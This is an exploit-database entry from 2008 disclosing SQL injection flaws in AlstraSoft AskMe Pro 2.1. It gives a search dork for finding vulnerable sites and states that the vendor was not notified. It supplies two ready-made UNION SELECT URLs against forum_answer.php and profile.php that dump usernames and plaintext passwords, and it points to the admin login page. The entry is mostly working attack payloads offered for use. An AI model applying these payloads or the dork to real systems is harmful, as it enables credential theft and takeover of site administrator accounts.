Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections



EKU-ID: 13752 CVE: OSVDB-47090;CVE-2008-2902;OSVDB-46167;CVE-2008-2857;OSVDB-46166 OSVDB-ID:
Author: t0pP8uZz Published: 2008-06-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


-[*]+================================================================================+[*]-
-[*]+		  AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilitys	     +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: t0pP8uZz
[*] Discovered On: 10 JUNE 2008
[*] Script Download: http://alstrasoft.com/askme.htm
[*] DORK: "Powered By AlstraSoft AskMe Pro"



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

	AskMe Pro suffers from a insecure mysql query, this allows the remote attacker to view
	all users and there plaintext passwords.

	the injection is multirow so it should show all users on one page.



[*] SQL Injection:

	multi-row: http://site.com/forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/FROM/**/expert/*
	normal:    http://site.com/profile.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**/FROM/**/expert/**/LIMIT/**/0,1/*



[*] NOTE/TIP:

	admin login is at /admin/
	passwords are in plaintext


[*] GREETZ:

	milw0rm.com, h4ck-y0u.org, CipherCrew, Offensive-Security.com !



[-] peace,

	t0pP8uZz



-[*]+================================================================================+[*]-
-[*]+		  AlstraSoft AskMe Pro <= 2.1 SQL Injection Vulnerabilitys	     +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-06-14]